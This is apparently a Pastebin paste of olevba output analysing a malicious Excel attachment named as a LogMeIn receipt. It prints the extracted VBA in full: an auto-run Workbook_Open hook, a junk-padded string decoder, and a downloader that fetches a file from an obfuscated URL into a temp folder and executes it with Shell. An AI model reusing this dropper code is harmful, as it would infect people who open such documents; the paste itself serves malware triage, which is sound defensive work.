Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS---- logmein_pro_receipt.xls
- (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: logmein_pro_receipt.xls
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ÝòàÊíèãà.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub Workbook_Open()
- jQ5
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+---------------+----------------------------------------+
- | Type | Keyword | Description |
- +----------+---------------+----------------------------------------+
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- +----------+---------------+----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò1.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò2.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò3.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class2.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class3.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function vxRuzMJsFffGPcDYCb(AUKBPaIIvwQgsU As String) As String
- GoTo jvLMiktQy
- jvLMiktQy:
- GoTo YexFubVVUa
- YexFubVVUa:
- For SrJVJGASPnQ = 1 To Len(AUKBPaIIvwQgsU) Step 2
- GoTo pPBRUYPoRwgcQlcS
- pPBRUYPoRwgcQlcS:
- GoTo ZZMyawIQEV
- ZZMyawIQEV:
- GoTo maQQjhDZxDzLOdzA
- maQQjhDZxDzLOdzA:
- GoTo OsHauNHxdmnlqbTbFSR
- OsHauNHxdmnlqbTbFSR:
- GoTo ogETMxfh
- ogETMxfh:
- vxRuzMJsFffGPcDYCb = vxRuzMJsFffGPcDYCb & Mid(AUKBPaIIvwQgsU, SrJVJGASPnQ, 1)
- GoTo wGcpdOq
- wGcpdOq:
- Next
- GoTo UmYcCdoiA
- UmYcCdoiA:
- GoTo pOGCNfuPDMkfIKrKQZN
- pOGCNfuPDMkfIKrKQZN:
- GoTo DBGekrVjiyCEw
- DBGekrVjiyCEw:
- GoTo dNvxRuzM
- dNvxRuzM:
- GoTo FffGPcDYCb
- FffGPcDYCb:
- GoTo tEyQzQGQQSfvKRTdAv
- tEyQzQGQQSfvKRTdAv:
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Class4.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class5.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class6.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO dfgfdg.bas
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/dfgfdg'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 Then
- Private Declare PtrSafe Function FnjkHBKJBl Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal sdfFFF As LongPtr, _
- ByVal kJNJKBl As String, _
- ByVal ghjVFF As String, _
- ByVal BGgdhF As Long, _
- ByVal VVgfh As LongPtr) As LongPtr
- #Else
- Private Declare Function FnjkHBKJBl Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal sdfFFF As Long, _
- ByVal kJNJKBl As String, _
- ByVal ghjVFF As String, _
- ByVal BGgdhF As Long, _
- ByVal VVgfh As Long) As Long
- #End If
- Sub jQ5()
- mog4O4d49 vxRuzMJsFffGPcDYCb("hHtztHp^:R/u/Ujuanvidze,sMijgxn{.)dWeM/…j%sd/pb1i@n,.ie`xae^"), Environ(vxRuzMJsFffGPcDYCb("TgMJPW")) & vxRuzMJsFffGPcDYCb("\eG…HUjSkrd_fdgT.„eXx/e+")
- End Sub
- Function mog4O4d49(Mh9_094suu As String, R4_t As String) As Boolean
- vJHKBJdfkgfg = FnjkHBKJBl(0&, Mh9_094suu, R4_t, 0&, 0&)
- Dim j_W8
- j_W8 = Shell(R4_t, 1)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | URLDownloadToFileA | May download files from the Internet |
- +------------+--------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Class7.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class7'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class8.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class9.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class9'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class10.cls
- in file: logmein_pro_receipt.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class10'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement